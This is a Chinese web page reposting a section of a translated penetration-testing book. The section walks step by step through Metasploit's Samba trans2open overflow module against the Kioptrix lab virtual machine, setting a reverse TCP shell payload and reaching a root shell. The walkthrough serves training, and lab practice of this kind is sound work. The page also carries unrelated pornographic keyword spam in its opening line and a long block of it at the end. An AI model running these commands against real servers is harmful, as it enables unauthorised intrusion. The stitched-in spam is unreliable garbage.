天堂国产午夜亚洲专区-少妇人妻综合久久蜜臀-国产成人户外露出视频在线-国产91传媒一区二区三区

當(dāng)前位置:主頁 > 論文百科 > 英文數(shù)據(jù)庫 >

4.6.3 使用Metasploit對Kioptrix進(jìn)行漏洞利用

發(fā)布時間:2017-04-06 21:09

  本文關(guān)鍵詞:高度安全環(huán)境下的高級滲透測試,由筆耕文化傳播整理發(fā)布。


> 高度安全環(huán)境下的高級滲透測試 4.6.3 使用Metasploit對Kioptrix進(jìn)行漏洞利用 2014-09-04 16:52:23         我要投稿   

本文所屬圖書 > 高度安全環(huán)境下的高級滲透測試

本書是一本介紹高級安全滲透測試的安全技術(shù)圖書,采用步驟方式講解了在安全環(huán)境下進(jìn)行滲透測試的相關(guān)技術(shù)、工具和知識。本書分為11章,分別講解了如何計劃和界定一次成功的滲透測試,用來進(jìn)行偵查以求獲取信息的  立即去當(dāng)當(dāng)網(wǎng)訂購

現(xiàn)在是時候介紹如何使用Metasploit來攻擊我們的Kioptrix虛擬機了。我們已經(jīng)學(xué)會了如何對網(wǎng)上提供的POC代碼進(jìn)行編譯和使用,現(xiàn)在來看看Metasploit中的實現(xiàn)方式,這樣能節(jié)約大量的時間。首先我們需要連接到數(shù)據(jù)庫。

# msfconsole
msf > db_connect postgres:myPassword@127.0.0.1/pentester

在數(shù)據(jù)庫中我們已經(jīng)獲得了目標(biāo)系統(tǒng)的相關(guān)信息。你可以使用services命令查看:

msf > services

命令的輸出結(jié)果如下:

Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 192.168.75.14 22 tcp ssh open 192.168.75.14 80 tcp http open 192.168.75.14 111 udp rpcbind open 192.168.75.14 111 tcp rpcbind open 192.168.75.14 137 udp netbios-ns open 192.168.75.14 139 tcp netbios-ssn open 192.168.75.14 443 tcp https open 192.168.75.14 32768 tcp filenet-tms open 192.168.75.14 32768 udp omad open

可以看到我們先前利用的samba 139端口仍然開放,F(xiàn)在來看看在不必處理漏洞利用代碼的情況下,我們使用Metasploit能做的事情。

msf> search samba

結(jié)果如圖4.13所示。

4.6.3 使用Metasploit對Kioptrix進(jìn)行漏洞利用


 

模塊名:確定需要使用的漏洞利用模塊之后,可以使用USE命令后接模塊名來進(jìn)行使用。

發(fā)布時間:發(fā)布時間是社區(qū)或廠商獲得漏洞信息的實際時間,而不是相關(guān)POC代碼的發(fā)布時間。

排名:漏洞的排名非常重要,可以獲得漏洞可靠程度的信息。

描述:描述漏洞的類型。

我們將使用 trans2open 漏洞利用模塊,,其使用與本章之前介紹的掃描模塊類似。在msfconsole中輸入:

msf > use exploit/linux/samba/trans2open

我們可能需要了解模塊的更多信息,這時可以使用info命令來顯示:

msf exploit(trans2open) > info Name: Samba trans2open Overflow (Linux x86) Module: exploit/linux/samba/trans2open Version: 12196 Platform: Linux Privileged: Yes License: Metasploit Framework License (BSD) Rank: Great Provided by: hdm <hdm@metasploit.com> jduck <jduck@metasploit.com> Available targets: Id Name -- ---- 0 Samba 2.2.x - Bruteforce Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 139 yes The target port Payload information: Space: 1024 Avoid: 1 characters Description: This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC. References: ?name=2003-0201

Metasploit的所有漏洞利用模塊都有類似的信息。如果時間允許,應(yīng)該多花時間熟悉一下常用的漏洞利用模塊,以避免使用的模塊在目標(biāo)系統(tǒng)環(huán)境下不起作用的情況發(fā)生。
現(xiàn)在我們需要設(shè)置一些選項:

msf > set RHOST 192.168.75.14

RHOST是遠(yuǎn)程目標(biāo)主機,我們將其設(shè)置為Kioptrix虛擬機的IP地址。

msf > show payloads

如圖4.14所示,show payloads 命令顯示可供當(dāng)前模塊使用的所有攻擊載荷的列表。這里我們以使用reverse_tcp為例。這種攻擊載荷短小而有效,但不具備像Meterpreter那樣強大的功能。

4.6.3 使用Metasploit對Kioptrix進(jìn)行漏洞利用


 

> set payload linux/x86/shell/reverse_tcp

我們同樣需要設(shè)置LHOST和LPORT。

> set LHOST 192.168.75.12

這是我們需要監(jiān)聽的本地地址。

> set LPORT 2222

這里設(shè)置為需要監(jiān)聽的端口。

現(xiàn)在設(shè)置已經(jīng)完成,我們可以執(zhí)行模塊:

> exploit

如果一切按計劃進(jìn)行,你將看到如下的輸出信息,然后獲得類似于本章之前手動編譯漏洞利用代碼時獲得的Shell會話連接。

msf exploit(trans2open) > exploit [*] Started reverse handler on 192.168.75.12:2221 [*] Trying return address 0xbffffdfc... [*] Trying return address 0xbffffcfc... [*] Trying return address 0xbffffbfc... [*] Trying return address 0xbffffafc... [*] Sending stage (36 bytes) to 192.168.75.14 [*] Command shell session 2 opened (192.168.75.12:2221 -> 192.168.75.14:32802) at 2011-11-16 23:22:06 -0500

執(zhí)行下面的指令,以確保我們擁有root權(quán)限:

# mail Mail version 8.1 6/6/93.Type ? for help. "/var/mail/root": 6 messages 6 unread >U 1 root@kioptix.level1 Sat Sep 26 11:42 15/481 "About Level 2" U 2 root@kioptrix.level1 Thu Nov 10 19:34 19/534 "LogWatch for kioptrix" U 3 root@kioptrix.level1 Fri Nov 11 14:38 48/1235 "LogWatch for kioptrix" U 4 root@kioptrix.level1 Sun Nov 13 15:12 19/534 "LogWatch for kioptrix" U 5 root@kioptrix.level1 Mon Nov 14 18:23 244/12279 "LogWatch for kioptrix" U 6 root@kioptrix.level1 Wed Nov 16 15:19 19/534 "LogWatch for kioptrix"

在給root賬號的留言中,可以看到Loneferret給我們留言的一條好消息,輸入1讀。

# 1 Message 1: From root Sat Sep 26 11:42:10 2009 Date:Sat, 26 Sep 2009 11:42:10 -0400 From: root <root@kioptix.level1> To: root@kioptix.level1 Subject:About Level 2 If you are reading this, you got root.Congratulations. Level 2 won't be as easy...

從最后的這項練習(xí)可以清楚地看到,相比手動查找和編譯代碼,使用Metasploit是多么輕而易舉的一件事情。你甚至還能將你自己的模塊和編譯的代碼添加到Metasploit框架中。

點擊復(fù)制鏈接 與好友分享!回本站首頁 您對本文章有什么意見或著疑問嗎?請到論壇討論您的關(guān)注和建議是我們前行的參考和動力   上一篇:4.6.2 Metasploit和數(shù)據(jù)庫 下一篇:4.7 總結(jié) 相關(guān)文章

內(nèi)核漏洞的利用與防范

內(nèi)存破壞漏洞

內(nèi)核棧漏洞

內(nèi)核堆漏洞

1.2.1 計算機漏洞的性質(zhì)

1.2.2 計算機漏洞分類

漏洞管理

1.2 漏洞管理的起源

1.5 漏洞的來源

1.6 有缺陷的漏洞管理示例

圖文推薦


  本文關(guān)鍵詞:高度安全環(huán)境下的高級滲透測試,由筆耕文化傳播整理發(fā)布。



本文編號:289669

資料下載
論文發(fā)表

本文鏈接:http://sikaile.net/wenshubaike/mishujinen/289669.html


Copyright(c)文論論文網(wǎng)All Rights Reserved | 網(wǎng)站地圖 |

版權(quán)申明:資料由用戶92593***提供,本站僅收錄摘要或目錄,作者需要刪除請E-mail郵箱bigeng88@qq.com
精品推荐久久久国产av| 色哟哟精品一区二区三区| 麻豆看片麻豆免费视频| 中文字幕中文字幕在线十八区| 国产成人亚洲综合色就色| 精品国产亚洲免费91| 国产一级特黄在线观看| 高清一区二区三区四区五区| 在线懂色一区二区三区精品| 日本久久精品在线观看| 永久福利盒子日韩日韩| 国产又粗又猛又黄又爽视频免费| 日韩欧美一区二区黄色| 日本午夜免费观看视频| 在线日韩中文字幕一区| 香蕉久久夜色精品国产尤物| 欧美有码黄片免费在线视频| 在线免费国产一区二区三区| 亚洲欧美日韩另类第一页| 亚洲一区二区三区在线中文字幕| 欧美二区视频在线观看| 日韩欧美国产精品自拍| 国产av熟女一区二区三区四区| 日本视频在线观看不卡| 午夜激情视频一区二区| 久久精品亚洲欧美日韩| 91日韩欧美中文字幕| 99久久免费看国产精品| 日本久久精品在线观看| 麻豆一区二区三区精品视频| 久久久免费精品人妻一区二区三区 | 欧美日韩精品久久亚洲区熟妇人| 日本免费一级黄色录像| 欧美一区日韩二区亚洲三区| 成人日韩视频中文字幕| 午夜资源在线观看免费高清| 在线免费观看一二区视频| 我的性感妹妹在线观看| 91亚洲国产—区=区a| 日本亚洲欧美男人的天堂| 日韩综合国产欧美一区|